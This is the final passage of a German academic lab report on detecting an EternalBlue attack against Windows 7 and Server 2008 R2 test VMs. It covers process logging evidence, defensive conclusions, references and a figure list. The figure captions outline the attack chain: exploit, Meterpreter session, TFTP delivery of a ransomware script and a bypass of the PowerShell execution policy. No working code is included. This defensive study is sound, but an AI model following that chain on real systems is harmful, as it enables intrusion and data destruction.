3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
32
Nachweis des Angriffs via Prozess-Logging
Zum Mitschneiden der Prozessaktivitäten werden die Tools Process Moni-
tor und Process Explorer aus der Sysinterals Suite16 von Mark Russinovich
und Bryce Cogswell verwendet. Diese werden ebenfalls auf der Windows 7
VM ausgeführt.
Zunächst ein Nachweis der Prozessaktivität ohne jegliche externe Beein-
flussung:
Abbildung 27: Prozessliste bei Normalbetrieb der Windows 7 VM
Nach erfolgreicher Ausführung des EternalBlue Exploits kann man dann
aber auch schon die erste Veränderung erkennen:
16 https://docs.microsoft.com/en-us/sysinternals/downloads/
3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
33
Abbildung 28: Meterpreter-Prozess als Kind-Prozess des Druckerdienstes
Für gewöhnlich erschafft der Druckerdienst keine Eingabeaufforderung als
Kind-Prozess. Da er in diesem Fall jedoch gekapert wurde, um die Meter-
preter-Sitzung zu tarnen stellt dies die erste auffällige Unregelmäßigkeit dar.
Nachdem anschließend noch das PowerShell-Skript nachgeladen und aus-
geführt wird macht sich dies ebenfalls bemerkbar:
Abbildung 29: Ausführen des PowerShell-Skripts aus der Meterpreter-Sitzung heraus
3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
34
Weitere Details lassen sich dann aus dem Process Monitor entnehmen:
Abbildung 30: Gesamtverlauf des Angriffs im Process Monitor
Hier ist ebenfalls der Verlauf vom Erstellen der Meterpreter-Sitzung bis hin
zum Aufruf des PowerShell-Skripts ersichtlich.
4. Fazit
35
4. Fazit
Ein Angriff über EternalBlue als Einfallsvektor läuft nicht so lautlos ab, wie
es zunächst den Anschein hat. Es wird nachweisbarer Traffic generiert,
ebenso verhalten sich normalerweise unscheinbare Systemprozesse unty-
pisch.
Gleichzeitig sind das Erkennen und Abwehren aber auch nicht trivial. Sämt-
liche signaturbasierten Schutzmechanismen können erst greifen, wenn eine
für die verwendete Payload passende Signatur bekannt ist, die naturgemäß
erst mit Verzögerung bereitgestellt werden kann. Dies gilt sowohl für klassi-
sche AV-Lösungen wie auch für Intrusion Detection und Prevention Sys-
teme.
In der Praxis ist es häufig so, dass sich Clients zusammen mit Serversyste-
men im selben Subnetz befinden, was eine Infektion und deren Ausbreitung
natürlich begünstigt. In diesem Fall wäre eine Netzwerksegmentierung ein
designgetriebener Schutzfaktor. Dazu gehört selbstverständlich auch der
Einsatz von Firewalls mit entsprechend gepflegten Filterregeln.
Es empfiehlt sich daher mindestens zusätzlich zu den vorhandenen Schutz-
maßnahmen dynamische Erkennungsmethoden einzusetzen, wie bei-
spielsweise AV-Lösungen mit Verhaltenserkennung.
Außerdem sollte das Sicherheitsbewusstsein der Nutzer und Administrato-
ren durch kontinuierliche Schulungen und Trainings sensibilisiert werden,
damit sie ein effektiver Bestandteil des Gesamtsicherheitskonzeptes wer-
den und bleiben.
5. Links und Literatur
36
5. Links und Literatur
• Wikipedia „WannaCry“ (online): https://de.wikipedia.org/wiki/Wan-naCry (Zugriff 16.07.2019)
• Bundesamt für Sicherheit in der Informationstechnik „OPS.1.1.4 Schutz vor Schadprogrammen“ (online): https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKompendium/bau-steine/OPS/OPS_1_1_4_Schutz_vor_Schadprogrammen.html?nn=10137168#doc10095808bodyText7 (Zugriff 16.07.2019)
• Mitre „CVE-2017-0144“ (online): https://cve.mitre.org/cgi-bin/cve-name.cgi?name=CVE-2017-0144 (Zugriff 18.07.2019)
• Wikipedia „EternalBlue“ (online): https://de.wikipedia.org/wiki/Eter-nalBlue (Zugriff 18.07.2019)
• Bundesamt für Sicherheit in der Informationstechnik „Die Lage der IT-Sicherheit in der Bundesrepublik Deutschland 2017“ (online): https://www.bsi.bund.de/SharedDocs/Down-loads/DE/BSI/Publikationen/Lageberichte/Lagebericht2017.pdf?__blob=publicationFile&v=4 (Zugriff 18.07.2019)
• Microsoft Technet „Simulating A Ransomware Attack With PowerS-hell“ (online): https://blogs.technet.microsoft.com/canit-pro/2016/01/27/simulating-a-ransomware-attack-with-powershell/ (Zugriff 13.07.2019)
• Nocksoft „VirtualBox Netzwerkkonfiguration“ (online): https://nock-soft.de/tutorials/virtualbox-netzwerkkonfiguration/ (Zugriff 13.07.2019)
• NirSoft „SmartSniff“ (online): https://www.nirsoft.net/utils/smsniff.html (Zugriff 13.07.2019)
• Microsoft „Sysinternals Utilities“ (online): https://docs.micro-soft.com/en-us/sysinternals/downloads/ (Zugriff 13.07.2019)
6. Abbildungsverzeichnis
37
6. Abbildungsverzeichnis
ABBILDUNG 1: BEKANNTE SCHADPROGRAMME (2017 BIS MAI), QUELLE: AV-TEST .................................................................................................................................... 9
ABBILDUNG 2: BEISPIELDATEIEN FÜR DEN SIMULIERTEN RANSOMWARE-ANGRIFF .................................................................................................................. 15
ABBILDUNG 3: BEISPIELDATEN IN WINDOWS SERVER 2008 R2 ............................. 16 ABBILDUNG 4: NETZPLAN DER VERSUCHSUMGEBUNGEN ..................................... 16 ABBILDUNG 5: ERGEBNISSE DES NMAP-SCANS GEGEN DIE WIN7-VM ................. 17 ABBILDUNG 6: ÜBERPRÜFEN UND ANPASSEN DES ETERNALBLUE-SCANNERS . 18 ABBILDUNG 7: AUSFÜHRUNG UND ERGEBNISSE DES ETERNALBLUE SCANNERS
.................................................................................................................................. 18 ABBILDUNG 8: ÜBERPRÜFEN UND ANPASSEN DES ETERNALBLUE REMOTE
CODE EXECUTION EXPLOITS .............................................................................. 19 ABBILDUNG 9: AUSFÜHRUNG DES ETERNALBLUE REMOTE CODE EXECUTION
EXPLOITS UND ÜBERPRÜFUNG DER BERECHTIGUNGEN AUF DER WINDOWS 7 VM ...................................................................................................... 20
ABBILDUNG 10: ÜBERPRÜFEN UND ANPASSEN DES TFTP-SERVERS ................... 21 ABBILDUNG 11: NACHLADEN DES POWERSHELL-SKRIPTS IN DAS NEU
ERSTELLTE VERZEICHNIS .................................................................................... 21 ABBILDUNG 12: AUSFÜHREN DES POWERSHELL-SKRIPTS SCHLÄGT FEHL ........ 22 ABBILDUNG 13: NACHWEIS, DASS DAS AUSFÜHREN VON POWERSHELL-
SKRIPTEN NICHT ERLAUBT IST ........................................................................... 22 ABBILDUNG 14: ERFOLGREICHE AUSFÜHRUNG DES POWERSHELL-SKRIPTS
DURCH UMGEHUNG DER AUSFÜHRUNGSBESCHRÄNKUNG .......................... 23 ABBILDUNG 15: DIE TEXTDATEIEN WURDEN DURCH DAS POWERSHELL-SKRIPT
ÜBERSCHRIEBEN .................................................................................................. 23 ABBILDUNG 16: ERGEBNIS VON NMAP IN DER WINDOWS SERVER UMGEBUNG. 24 ABBILDUNG 17: SMB-VULNERABILITY-SCANNER IN DER SERVER 2008
UMGEBUNG ............................................................................................................ 25 ABBILDUNG 18: AUCH SERVER 2008 R2 IST ANGREIFBAR ...................................... 25 ABBILDUNG 19: ERFOLGREICH AUSGEFÜHRTER EXPLOIT GEGEN WINDOWS
SERVER 2008 R2 .................................................................................................... 26 ABBILDUNG 20: ZIELVERZEICHNIS AUF SERVER 2008 R2 ANGELEGT ................... 26 ABBILDUNG 21: AUSFÜHRUNGSRICHTLINIE UNTER WINDOWS SERVER 2008 R2 27 ABBILDUNG 22: ERFOLGSMELDUNG VON METERPRETER FÜR DAS PS-SKRIPT . 27 ABBILDUNG 23: KORRUMPIERTE DATEIEN NACH AUSFÜHRUNG DER PAYLOAD 28 ABBILDUNG 24: MITSCHNITT DES ETERNALBLUE REMOTE CODE EXPLOITS ...... 30 ABBILDUNG 25: ÜBERTRAGUNG DES RANSOMWARE SKRIPTS PER TFTP ........... 31 ABBILDUNG 26:MITSCHNITT DER METERPRETER SITZUNG IM KLARTEXT ........... 31 ABBILDUNG 27: PROZESSLISTE BEI NORMALBETRIEB DER WINDOWS 7 VM ....... 32 ABBILDUNG 28: METERPRETER-PROZESS ALS KIND-PROZESS DES
DRUCKERDIENSTES .............................................................................................. 33 ABBILDUNG 29: AUSFÜHREN DES POWERSHELL-SKRIPTS AUS DER
METERPRETER-SITZUNG HERAUS ..................................................................... 33 ABBILDUNG 30: GESAMTVERLAUF DES ANGRIFFS IM PROCESS MONITOR ......... 34
7. Eigenständigkeitserklärung
38
7. Eigenständigkeitserklärung
Hiermit erklären wir, dass wir die hier vorliegende Arbeit selbstständig, ohne
unerlaubte fremde Hilfe und nur unter Verwendung der in der Arbeit aufge-
führten Hilfsmittel angefertigt haben.
Hamburg, 23.07.2019, Lars Jacke
Marl, 23.07.2019 Angelina Kany